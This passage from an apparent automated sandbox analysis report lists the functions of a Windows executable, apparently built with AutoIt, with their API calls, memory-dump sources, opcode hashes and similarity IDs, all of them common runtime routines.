                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                                                                                                                                      • Instruction ID: 0d0763a59c33658ef127cb2984160b16f74115b97a8710c35689b71e0317752f
                                                                                                                                                                      • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                                                                                                                                                      • Instruction Fuzzy Hash: A7E012B2609B016ACE26A779BD40A9367EE5F48750B19081EB40ADF242DE24FC418124
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D6F08, Relevance: 4.5, APIs: 3, Instructions: 21COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000002C,00000000,?,00000002,00000000,?,003D6CFD,00000000,?,003D6DF1,00000000,00000000,003B49E5), ref: 003D6F1E
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,003D6CFD,00000000,?,003D6DF1,00000000,00000000,003B49E5), ref: 003D6F26
                                                                                                                                                                      • DuplicateHandle.KERNELBASE(00000000,?,003D6CFD,00000000,?,003D6DF1,00000000,00000000,003B49E5), ref: 003D6F2D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentProcess$DuplicateHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1294930198-0
                                                                                                                                                                      • Opcode ID: 5579341a056dd9e5187bbfb4c9ae6101db804f203b76fbac8c80cd47a52ba17e
                                                                                                                                                                      • Instruction ID: 5260d93835f9868df2e9f736b4d66cd01a0f86660ecc430662cd0d4db6de557e
                                                                                                                                                                      • Opcode Fuzzy Hash: 5579341a056dd9e5187bbfb4c9ae6101db804f203b76fbac8c80cd47a52ba17e
                                                                                                                                                                      • Instruction Fuzzy Hash: F2D0177B148609BFC7035B95FC0AF3A7A2CEFD5B62F10042AFA0585260CA748400A620
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D6D60, Relevance: 4.5, APIs: 3, Instructions: 17COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 003D74D2: InterlockedExchange.KERNEL32(?,?), ref: 003D74E5
                                                                                                                                                                        • Part of subcall function 003D74D2: EnterCriticalSection.KERNEL32(?,?,00381044,?,?), ref: 003D74F6
                                                                                                                                                                        • Part of subcall function 003D74D2: TerminateThread.KERNEL32(00000000,000001F6,?,00381044,?,?), ref: 003D7503
                                                                                                                                                                        • Part of subcall function 003D74D2: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00381044,?,?), ref: 003D7510
                                                                                                                                                                        • Part of subcall function 003D74D2: InterlockedExchange.KERNEL32(?,000001F6), ref: 003D7523
                                                                                                                                                                        • Part of subcall function 003D74D2: LeaveCriticalSection.KERNEL32(?,?,00381044,?,?), ref: 003D752A
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,003D6DC6), ref: 003D6D71
                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(?,?,003D6DC6), ref: 003D6D7A
                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,?,003D6DC6), ref: 003D6D8D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$CloseExchangeInterlocked$ChangeDeleteEnterFindHandleLeaveNotificationObjectSingleTerminateThreadWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 744473657-0
                                                                                                                                                                      • Opcode ID: de405da0694b71f0946201e4d0ddfc4d0d55e21d3068ef40d3b33c72abc16d52
                                                                                                                                                                      • Instruction ID: 24a0983a7fe1d93bae1cf1e273166052ee08a2805d69a9159b2d053a2892a439
                                                                                                                                                                      • Opcode Fuzzy Hash: de405da0694b71f0946201e4d0ddfc4d0d55e21d3068ef40d3b33c72abc16d52
                                                                                                                                                                      • Instruction Fuzzy Hash: BAE0E23700050BAFCB072FA4FD088A9BBB9BF883403588123F405C6A30DBB1A8B1CB54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0037AB23, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: CALL
                                                                                                                                                                      • API String ID: 0-4196123274
                                                                                                                                                                      • Opcode ID: fff6fbff63f147aad2973bf96b159de1db58c21793b58ddeed3ee13b28e53369
                                                                                                                                                                      • Instruction ID: f699a049617b3e09d96fbdcf85064d610fadcf5ca79efdded8a4d92c21951be3
                                                                                                                                                                      • Opcode Fuzzy Hash: fff6fbff63f147aad2973bf96b159de1db58c21793b58ddeed3ee13b28e53369
                                                                                                                                                                      • Instruction Fuzzy Hash: C3225874508641DFCB2ADF14C490B6ABBF5BF84304F15895DE98A8B762D739EC81CB82
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0037492E, Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsThemeActive.UXTHEME ref: 00374992
                                                                                                                                                                        • Part of subcall function 003935AC: __lock.LIBCMT ref: 003935B2
                                                                                                                                                                        • Part of subcall function 003935AC: DecodePointer.KERNEL32(00000001,?,003749A7,003C81BC), ref: 003935BE
                                                                                                                                                                        • Part of subcall function 003935AC: EncodePointer.KERNEL32(?,?,003749A7,003C81BC), ref: 003935C9
                                                                                                                                                                        • Part of subcall function 00374A5B: SystemParametersInfoW.USER32 ref: 00374A73
                                                                                                                                                                        • Part of subcall function 00374A5B: SystemParametersInfoW.USER32 ref: 00374A88
                                                                                                                                                                        • Part of subcall function 00373B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00373B7A
                                                                                                                                                                        • Part of subcall function 00373B4C: IsDebuggerPresent.KERNEL32 ref: 00373B8C
                                                                                                                                                                        • Part of subcall function 00373B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,004362F8,004362E0,?,?), ref: 00373BFD
                                                                                                                                                                        • Part of subcall function 00373B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00373C81
                                                                                                                                                                      • SystemParametersInfoW.USER32 ref: 003749D2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1438897964-0
                                                                                                                                                                      • Opcode ID: c5b6216c87819a0154f7a9f506e1430455d80d19503c6bcbd2f88001d06f3a1f
                                                                                                                                                                      • Instruction ID: 6bb348354aa4784cafebaac394ba79c2c0b5d8cdf3397d684e13962a5fee806e
                                                                                                                                                                      • Opcode Fuzzy Hash: c5b6216c87819a0154f7a9f506e1430455d80d19503c6bcbd2f88001d06f3a1f
                                                                                                                                                                      • Instruction Fuzzy Hash: 6F11AEB1508301AFC711EF28DC4591BFBF8EF95700F01852EF4848B261DB709554CB95
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00390FF6, Relevance: 3.0, APIs: 2, Instructions: 44COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0039594C: __FF_MSGBANNER.LIBCMT ref: 00395963
                                                                                                                                                                        • Part of subcall function 0039594C: __NMSG_WRITE.LIBCMT ref: 0039596A
                                                                                                                                                                        • Part of subcall function 0039594C: RtlAllocateHeap.NTDLL(01190000,00000000,00000001,?,?,?,?,00391013,?,0000FFFF), ref: 0039598F
                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0039102C
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00391041
                                                                                                                                                                        • Part of subcall function 003987DB: RaiseException.KERNEL32(?,?,0000FFFF,0042BAF8,?,?,?,?,?,00391046,0000FFFF,0042BAF8,?,00000001), ref: 00398830
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3902256705-0
                                                                                                                                                                      • Opcode ID: 65a744262f4a73c1de96ac28bd4395ee52a82914a9c864acd070fc6195e02740
                                                                                                                                                                      • Instruction ID: b101d6d2a1d55ceff9ada02426043af0d468054daf0a845a78d5e6d5a4ec079d
                                                                                                                                                                      • Opcode Fuzzy Hash: 65a744262f4a73c1de96ac28bd4395ee52a82914a9c864acd070fc6195e02740
                                                                                                                                                                      • Instruction Fuzzy Hash: CEF0C83550022EA6CF23BB98ED059DF77AC9F01351F204426F904BA6D1DFB69E8092D4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003955D6, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00398D68: __getptd_noexit.LIBCMT ref: 00398D68
                                                                                                                                                                      • __lock_file.LIBCMT ref: 0039561B
                                                                                                                                                                        • Part of subcall function 00396E4E: __lock.LIBCMT ref: 00396E71
                                                                                                                                                                      • __fclose_nolock.LIBCMT ref: 00395626
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2800547568-0
                                                                                                                                                                      • Opcode ID: 8c598d1f9f721999c9c9c7d0588e263078d4ce4f6fafe5f580bdc566720eb8d5
                                                                                                                                                                      • Instruction ID: 4017ce0f5b1ce86a225a57b7d476ba856ba3315683860dcacd5c16f5f1f7c3e9
                                                                                                                                                                      • Opcode Fuzzy Hash: 8c598d1f9f721999c9c9c7d0588e263078d4ce4f6fafe5f580bdc566720eb8d5
                                                                                                                                                                      • Instruction Fuzzy Hash: 1AF0B472901A049ADF23BF76980276E7BA16F82334F658209E455AF1C1CF7C8A819B55
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003D6CC1, Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000014,00000FA0,00000001,00000000,?,003D6DF1,00000000,00000000,003B49E5), ref: 003D6CE6
                                                                                                                                                                      • InterlockedExchange.KERNEL32(00000034,00000000), ref: 003D6D08
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4104817828-0
                                                                                                                                                                      • Opcode ID: 679db80687530c3cbacb31d30ee3725147ec885b6baa8d4b08058dd8cee9d2dc
                                                                                                                                                                      • Instruction ID: c201dd41b221d7830871c5ad8f31753ccec3a503110406cb068afe4e14600f91
                                                                                                                                                                      • Opcode Fuzzy Hash: 679db80687530c3cbacb31d30ee3725147ec885b6baa8d4b08058dd8cee9d2dc
                                                                                                                                                                      • Instruction Fuzzy Hash: 99F034B1100B059FC7209F16E9489A7FBECEF84710B00882EE89687A10C7B4A441CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003744CB, Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 003744F7
                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00374527
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconNotifyShell__memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 928536360-0
                                                                                                                                                                      • Opcode ID: 3cb315518986d57ae727b39f95988125bb15409e8932379aeab931c28dc36b72
                                                                                                                                                                      • Instruction ID: ad3192b14b080858620089d5d748bcae6609c0641292834b6412fa8de64f2bc5
                                                                                                                                                                      • Opcode Fuzzy Hash: 3cb315518986d57ae727b39f95988125bb15409e8932379aeab931c28dc36b72
                                                                                                                                                                      • Instruction Fuzzy Hash: A1F082B19043089FDB639B24DC457A677AC9701308F0141EAAA0C96252DB750B98CB55
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003932DF, Relevance: 3.0, APIs: 2, Instructions: 7COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ___crtCorExitProcess.LIBCMT ref: 003932E5
                                                                                                                                                                        • Part of subcall function 003932AB: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,003932EA,00391013,?,00399EFE,000000FF,0000001E,0042BE28,00000008,00399E62,00391013,00391013), ref: 003932BA
                                                                                                                                                                        • Part of subcall function 003932AB: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 003932CC
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 003932EE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2427264223-0
                                                                                                                                                                      • Opcode ID: a1616993f450051a6c6a6a7240aedee91af9beb86660d90f3dda413939b06b02
                                                                                                                                                                      • Instruction ID: b25fd4da8c2cdf9d194d319cf1769a0c0b1ae1b9f625c5f22bc3ca11e545bd6e
                                                                                                                                                                      • Opcode Fuzzy Hash: a1616993f450051a6c6a6a7240aedee91af9beb86660d90f3dda413939b06b02
                                                                                                                                                                      • Instruction Fuzzy Hash: 4DB09230000208BFDF022F11DC0A8583F69FF00B90B004021F80448071DB72AA92DA84
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0037766F, Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                      • Opcode ID: d09f02d6561eecc8e9b6a9aad645d7ffead9f8c8a94b3cfc514d59514cc4219c
                                                                                                                                                                      • Instruction ID: e524500879945592555aeded243adb765ff72ba0988d8f6c6812393810e97f19
                                                                                                                                                                      • Opcode Fuzzy Hash: d09f02d6561eecc8e9b6a9aad645d7ffead9f8c8a94b3cfc514d59514cc4219c
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F318079208A02DFC73A9F18C490A31F7E4FF09710715C569E99E8B765E734E891CB94
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003B00D6, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                      • Opcode ID: 9c01994660a105d28c80226da2f5ae60b8281a4854196711d5b6d0b2b960f1c8
                                                                                                                                                                      • Instruction ID: 05728d660edd34c6f908f03b53b5815f8c6b18603a03e3789d5de40b2e1692ce
                                                                                                                                                                      • Opcode Fuzzy Hash: 9c01994660a105d28c80226da2f5ae60b8281a4854196711d5b6d0b2b960f1c8
                                                                                                                                                                      • Instruction Fuzzy Hash: 94413874508341CFDB26DF14C484B1ABBE0BF85318F19899CE99A4B762C336EC45CB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00374F3D, Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00374D13: FreeLibrary.KERNEL32(00000000,?), ref: 00374D4D
                                                                                                                                                                        • Part of subcall function 0039548B: __wfsopen.LIBCMT ref: 00395496
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00374F6F
                                                                                                                                                                        • Part of subcall function 00374CC8: FreeLibrary.KERNEL32(00000000), ref: 00374D02
                                                                                                                                                                        • Part of subcall function 00374DD0: _memmove.LIBCMT ref: 00374E1A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1396898556-0
                                                                                                                                                                      • Opcode ID: f708b538aeb41f6dbf0601e950f30de17fd1c964341cef489801de456fa3d18b
                                                                                                                                                                      • Instruction ID: 24af3e0d6a0505931668e269defd59c041b93272c768b12d2de14e80bb2a47b0
                                                                                                                                                                      • Opcode Fuzzy Hash: f708b538aeb41f6dbf0601e950f30de17fd1c964341cef489801de456fa3d18b
                                                                                                                                                                      • Instruction Fuzzy Hash: B611EB31700205BBCB37EF70DC42B6D77A89F41B00F10C429F545AA1C1DB79AA059790
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 003B01AF, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                      • Opcode ID: 16280cb4cbb5352a1ef5d294e33d5ddbe03f4eb199203783f1c74a422c2f2ae5
                                                                                                                                                                      • Instruction ID: 0368041ada067b020c48f7983b2e14426c97eefaaf8722ba949b110616ced947
                                                                                                                                                                      • Opcode Fuzzy Hash: 16280cb4cbb5352a1ef5d294e33d5ddbe03f4eb199203783f1c74a422c2f2ae5
                                                                                                                                                                      • Instruction Fuzzy Hash: A12113B4508341CFCB26DF24C484B2BBBE4BF84304F05896CE99A5BB61D736E845CB52
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00377F41, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000005.00000002.212278628.0000000000371000.00000020.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                      • Associated: 00000005.00000002.212265980.0000000000370000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212350488.00000000003FF000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212373588.0000000000425000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212382419.000000000042F000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000005.00000002.212391634.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4104443479-0
                                                                                                                                                                      • Opcode ID: e7a8acaff0dd18adfeba5149500d431f4b3b18e4c459974d74edb3a1938b8d20
                                                                                                                                                                      • Instruction ID: 10d9956b804164126e5e6e74babcb225f31c07b1446eaf3cea4e0f7ee45b6533
                                                                                                                                                                      • Opcode Fuzzy Hash: e7a8acaff0dd18adfeba5149500d431f4b3b18e4c459974d74edb3a1938b8d20
                                                                                                                                                                      • Instruction Fuzzy Hash: 9301D6722047017ED7369B28CC02F67BB98AB44B60F11852AF65ACA291EA75E5008B50
                                                                                                                                                                      Uniqueness

